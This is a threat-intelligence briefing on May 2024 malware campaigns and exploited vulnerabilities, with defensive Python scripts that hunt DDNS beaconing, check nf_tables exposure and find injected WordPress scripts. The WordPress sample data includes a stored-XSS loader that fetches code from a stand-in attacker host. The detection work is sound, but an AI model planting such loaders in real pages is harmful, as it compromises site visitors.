Cyware Daily Threat Intelligence

Daily Threat Briefing May 31, 2024

In a recent wave of cyber incidents, attackers deployed the Chalubo RAT to over 600,000 SOHO routers and remotely bricked them, forcing hardware replacements. Concurrently, CISA flagged a high-severity Linux kernel vulnerability (CVE-2024-1086) for urgent patching because it is being actively exploited. Meanwhile, Check Point's network security gateways are affected by a newly disclosed information disclosure flaw (CVE-2024-24919). Both vulnerabilities have been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog.

Adding to these challenges, cybercriminals are leveraging fake browser updates to disseminate two malware strains, BitRAT and Lumma Stealer, that compromise systems and steal data.

Top Malware Reported in the Last 24 Hours

Pumpkin Eclipse assault uncovered

Unknown attackers deployed the Chalubo RAT to over 600,000 SOHO routers belonging to a single ISP and rendered the devices permanently inoperable, so that every affected unit had to be replaced. The targeted router models were ActionTec's T3200 and T3260. The initial access vector is still unknown: no known vulnerabilities affect these models, which points to weak credentials or an exposed management interface rather than an exploit. The attack, named Pumpkin Eclipse, has not been linked to any known nation-state activity.

MS Office cracks deliver malware cocktail

Cybercriminals are using cracked versions of Microsoft Office, Windows, and Hangul Word Processor to distribute a malware cocktail to unsuspecting users. The malicious installer has a well-crafted interface that allows users to select the version and language, but it launches obfuscated .NET malware in the background. The malware contacts Telegram or Mastodon channels to receive a valid download URL, often from Google Drive or GitHub, to fetch additional malware components such as Orcus RAT, XMRig, 3Proxy, PureCrypter, and AntiAV.

FlyingYeti drops COOKBOX malware

Cloudflare disrupted a month-long phishing campaign by the Russia-aligned threat actor FlyingYeti that targeted Ukraine, chiefly Ukrainian military entities, with debt-themed lures delivering a PowerShell malware known as COOKBOX. The campaign abused Cloudflare Workers and GitHub for hosting and exploited a WinRAR vulnerability (CVE-2023-38831) to run the malware. Once installed, the COOKBOX variant polls a dynamic-DNS (DDNS) domain for command and control, waiting for PowerShell cmdlets to execute.
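
The C2 pattern above, a host repeatedly resolving a dynamic-DNS name and waiting for commands, is something defenders can hunt for in DNS logs. The script that follows is an added example for this briefing, not Cloudflare's or Cyware's code. It assumes a simple "timestamp client qname" log format and a short list of DDNS provider zones; both the log lines and the suffix list are constructed for illustration, and the COOKBOX domain itself is not included.

```python
"""Hunt for beaconing to dynamic-DNS hostnames in DNS query logs.

Added example for the briefing (not Cloudflare's or Cyware's code). Assumes
a 'timestamp client qname' log format and an illustrative DDNS suffix list.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed: a handful of well-known dynamic-DNS provider zones. Extend from
# your own threat intel; this list is an example, not one from any report.
DDNS_SUFFIXES = (
    ".serveftp.com", ".no-ip.org", ".ddns.net", ".hopto.org", ".zapto.org",
    ".duckdns.org", ".dynu.com", ".dyndns.org", ".mooo.com",
)

# Constructed sample log lines: "<ISO timestamp> <client> <qname>".
# One host resolves the same DDNS name every ~5 minutes (beacon-like);
# another resolves a DDNS name once; the rest is ordinary traffic.
SAMPLE_LOG = """\
2024-05-30T09:00:00 10.1.2.15 login.microsoftonline.com
2024-05-30T09:00:05 10.1.2.15 updates.example-corp.serveftp.com
2024-05-30T09:05:05 10.1.2.15 updates.example-corp.serveftp.com
2024-05-30T09:10:04 10.1.2.15 updates.example-corp.serveftp.com
2024-05-30T09:15:06 10.1.2.15 updates.example-corp.serveftp.com
2024-05-30T09:12:00 10.1.2.77 files.duckdns.org
2024-05-30T09:20:00 10.1.2.15 www.wikipedia.org
"""


def is_ddns(qname: str) -> bool:
    """True if the query name sits under one of the assumed DDNS zones."""
    q = qname.lower().rstrip(".")
    return any(q.endswith(s) for s in DDNS_SUFFIXES)


def parse_log(text: str):
    """Yield (timestamp, client, qname) tuples from the assumed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname = line.split()
        yield datetime.fromisoformat(ts), client, qname


def find_ddns_beacons(text: str, min_queries: int = 3, max_jitter: float = 0.2):
    """Group DDNS lookups per (client, qname) and flag regular intervals.

    A host resolving the same DDNS name repeatedly at near-constant spacing
    looks like a C2 check-in loop rather than a user browsing. Returns
    {(client, qname): {"count": n, "interval_s": mean_gap, "periodic": bool}}.
    """
    seen = defaultdict(list)
    for ts, client, qname in parse_log(text):
        if is_ddns(qname):
            seen[(client, qname.lower())].append(ts)

    findings = {}
    for key, stamps in seen.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        interval = None
        periodic = False
        if len(stamps) >= min_queries:
            interval = mean(gaps)
            # Coefficient of variation: little spread around the mean gap
            # means the lookups are on a timer, i.e. beacon-like.
            periodic = interval > 0 and pstdev(gaps) / interval <= max_jitter
        findings[key] = {"count": len(stamps), "interval_s": interval, "periodic": periodic}
    return findings


if __name__ == "__main__":
    for (client, qname), f in find_ddns_beacons(SAMPLE_LOG).items():
        flag = "BEACON?" if f["periodic"] else "ddns"
        print(f"{flag:8} {client} -> {qname} ({f['count']} queries)")
```

The suffix match alone produces noise on networks where people legitimately use DDNS; the periodicity test is what separates a sleep-loop implant from a one-off lookup, so tune `min_queries` and `max_jitter` to your log volume before alerting on it.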

Fake browser updates deliver malware

eSentire's Threat Response Unit (TRU) uncovered a malware campaign that uses fake browser update pages to deliver two malware families, BitRAT and Lumma Stealer, which steal sensitive data and give the attacker control of the system. The chain starts with malicious JavaScript injected into a compromised web page, which redirects the visitor to a fake update page. That page serves a ZIP archive named 'Update.zip' whose contents fetch and execute the payloads.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds two new bugs to KEV Catalog

CISA has added a high-severity vulnerability in the Linux kernel's netfilter nf_tables component (CVE-2024-1086) to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation, and has given federal agencies until June 20 to patch. CVE-2024-1086 is a use-after-free vulnerability that allows a local, unprivileged user to escalate to root and potentially execute arbitrary code in the kernel. The other flaw, CVE-2024-24919, was newly disclosed in Check Point's network security gateway products. It allows an unauthenticated attacker to read sensitive information from internet-connected gateways that have the remote access VPN or mobile access blade enabled.
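
For CVE-2024-1086 the fix is the kernel update, and patch level has to be compared against your distribution's advisory. While hosts wait for that, administrators commonly check two hardening controls that close the unprivileged exploitation path: unprivileged user namespaces, which are how a normal user obtains CAP_NET_ADMIN in a private network namespace and so reaches the nf_tables API, and whether the nf_tables module is loaded or can be autoloaded. The following posture check is an added example for this briefing, not CISA's or any vendor's tooling; it does not detect the bug itself. It assumes the standard Linux sysctl and modprobe.d locations (the `unprivileged_userns_clone` sysctl exists only on Debian-derived kernels).

```python
"""Posture check for the CVE-2024-1086 (nf_tables use-after-free) attack surface.

Added example for the briefing, not CISA's or a vendor's tooling. Reports
whether two commonly cited mitigations are in place; it does not test for
the vulnerability, and patching remains the actual fix.
"""
from pathlib import Path

# Assumed: standard sysctl/proc paths. unprivileged_userns_clone exists only
# on Debian/Ubuntu kernels; max_user_namespaces is upstream.
MAX_USERNS = Path("/proc/sys/user/max_user_namespaces")
USERNS_CLONE = Path("/proc/sys/kernel/unprivileged_userns_clone")
PROC_MODULES = Path("/proc/modules")
MODPROBE_DIR = Path("/etc/modprobe.d")


def userns_restricted(max_userns, userns_clone) -> bool:
    """True if either sysctl disables unprivileged user namespace creation.

    Arguments are the files' contents as strings, or None if a file is absent.
    """
    if max_userns is not None and max_userns.strip() == "0":
        return True
    if userns_clone is not None and userns_clone.strip() == "0":
        return True
    return False


def nf_tables_loaded(proc_modules: str) -> bool:
    """True if nf_tables appears in /proc/modules (first field is the name)."""
    return any(line.split(maxsplit=1)[0] == "nf_tables"
               for line in proc_modules.splitlines() if line.strip())


def nf_tables_blocked(modprobe_confs: dict) -> bool:
    """True if a modprobe.d file prevents nf_tables from being loaded.

    'install nf_tables /bin/false' (or /bin/true) really blocks loading.
    'blacklist nf_tables' only stops alias-based autoload and is not enough:
    a request for the module by its real name still loads it.
    """
    for text in modprobe_confs.values():
        for line in text.splitlines():
            parts = line.split()
            if (len(parts) >= 3 and parts[0] == "install" and parts[1] == "nf_tables"
                    and parts[2] in ("/bin/false", "/bin/true")):
                return True
    return False


def assess(max_userns, userns_clone, proc_modules, modprobe_confs) -> dict:
    """Combine the checks into a verdict dict."""
    userns = userns_restricted(max_userns, userns_clone)
    loaded = nf_tables_loaded(proc_modules)
    blocked = nf_tables_blocked(modprobe_confs)
    return {
        "userns_restricted": userns,
        "nf_tables_loaded": loaded,
        "nf_tables_blocked": blocked,
        # An unprivileged local user can reach nf_tables unless user
        # namespaces are off, or the module is both unloaded and blocked
        # (an unloaded but unblocked module is autoloaded on first use).
        "unprivileged_path_open": not userns and (loaded or not blocked),
    }


def _read(path: Path):
    return path.read_text() if path.exists() else None


def check_host() -> dict:
    """Run the assessment against the live system."""
    confs = ({str(f): f.read_text() for f in MODPROBE_DIR.glob("*.conf")}
             if MODPROBE_DIR.is_dir() else {})
    return assess(_read(MAX_USERNS), _read(USERNS_CLONE),
                  _read(PROC_MODULES) or "", confs)


if __name__ == "__main__":
    for key, value in check_host().items():
        print(f"{key:24} {value}")
```

Run it as root on a candidate host; `unprivileged_path_open: True` means neither mitigation is present and the kernel version is the only thing standing between a local user and root. Disabling user namespaces breaks rootless containers and some sandboxed browsers, so treat it as a stop-gap rather than a substitute for the patch.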

Critical WordPress Plugin Vulnerabilities

Vulnerabilities in three popular WordPress plugins are being exploited to inject malicious scripts and backdoors into sites, which in turn create new administrator accounts and track the infected sites. The exploited bugs are unauthenticated stored cross-site scripting (XSS) vulnerabilities in the WP Statistics (CVE-2024-2194), WP Meta SEO (CVE-2023-6961), and LiteSpeed Cache (CVE-2023-40000) plugins, which together have a large number of active installations.
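
Two things a site owner can check for after that kind of stored-XSS campaign are script tags that do not belong in stored content and administrator accounts nobody created. The script below is an added example for this briefing, not Fastly's, WordPress's or any plugin's code. It assumes two constructed inputs: post or option HTML as it would be dumped from wp_posts/wp_options, and an administrator list in the JSON shape produced by `wp user list --role=administrator --format=json`. The allowlisted hosts, the attacker host and the user names are all made up.

```python
"""Hunt for injected <script> tags and unexpected administrators on a WordPress site.

Added example for the briefing, not Fastly's, WordPress's or any plugin's code.
Inputs below are constructed; domains and logins are illustrative only.
"""
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: hosts the site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"example-shop.test", "www.googletagmanager.com"}

# Assumed baseline of administrator logins the owner knows about.
KNOWN_ADMINS = {"site_owner"}

# Constructed post content: one allowlisted script, one injected external
# script, and one injected inline loader of the kind stored-XSS plants.
SAMPLE_POST_HTML = """\
<p>Welcome to our shop.</p>
<script src="https://www.googletagmanager.com/gtag/js?id=X"></script>
<script src="https://cdn.attacker-example.test/stats.js"></script>
<script>var s=document.createElement('script');s.src='//cdn.attacker-example.test/x.js';document.head.appendChild(s);</script>
"""

# Constructed `wp user list --format=json` output ("roles" is a comma-separated string).
SAMPLE_USERS_JSON = json.dumps([
    {"ID": 1, "user_login": "site_owner", "roles": "administrator"},
    {"ID": 57, "user_login": "wp_helpdesk", "roles": "administrator"},
    {"ID": 12, "user_login": "editor_jane", "roles": "editor"},
])


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values
        self.inline = []     # inline script text
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def suspicious_scripts(html: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> dict:
    """Return external script URLs whose host is not allowlisted, plus inline scripts.

    Stored content (posts, widgets, options) should normally carry no <script>
    at all, so anything outside the allowlist is worth a look. A relative or
    protocol-relative src is handled by urlparse; a relative one has host ''
    and is therefore reported too.
    """
    collector = ScriptCollector()
    collector.feed(html)
    bad_external = []
    for src in collector.external:
        host = (urlparse(src).hostname or "").lower()
        if host not in allowed_hosts:
            bad_external.append(src)
    return {"external": bad_external, "inline": collector.inline}


def unexpected_admins(users_json: str, known=KNOWN_ADMINS) -> list:
    """Return administrator logins that are not in the known baseline."""
    users = json.loads(users_json)
    return sorted(u["user_login"] for u in users
                  if "administrator" in u.get("roles", "") and u["user_login"] not in known)


if __name__ == "__main__":
    print(suspicious_scripts(SAMPLE_POST_HTML))
    print("unexpected admins:", unexpected_admins(SAMPLE_USERS_JSON))
```

Feed the script with the real `wp post list` / `wp option get` output and a current `wp user list`; a hit in either function is a reason to rotate credentials and compare plugin versions against the advisories above, since simply deleting the rogue account leaves the stored payload in place.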

RedTail cryptominer exploits PAN-OS bug

The RedTail cryptocurrency miner has evolved to exploit a critical vulnerability (CVE-2024-3400) in Palo Alto Networks PAN-OS firewalls, and now uses new anti-analysis techniques and private mining pools. The malware spreads through multiple propagation mechanisms, exploiting vulnerabilities in systems such as TP-Link routers, ThinkPHP, and VMware Workspace ONE Access and Identity Manager. The latest version of RedTail carries encrypted mining configurations that it uses to launch its embedded XMRig miner.

Top Scams Reported in the Last 24 Hours

Scammers impersonate Malwarebytes

Malwarebytes warned users about scammers impersonating their brand to spread info-stealers. The fake websites offer malicious downloads that steal sensitive information from victims' devices. Scammers also use other tactics, such as selling illegal copies of Malwarebytes or sending phishing emails. The company advised users to download their software directly from the official website and be wary of any suspicious emails or websites claiming to be from the company.
